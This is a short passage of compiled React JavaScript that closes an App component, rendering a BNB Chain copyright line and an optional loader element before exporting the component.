  }, /*#__PURE__*/_react.default.createElement("p", null, "\xA9 2024 BNB Chain. All rights reserved."))), showLoader && /*#__PURE__*/_react.default.createElement(LoaderBox, null));
}
var _default = exports.default = App;
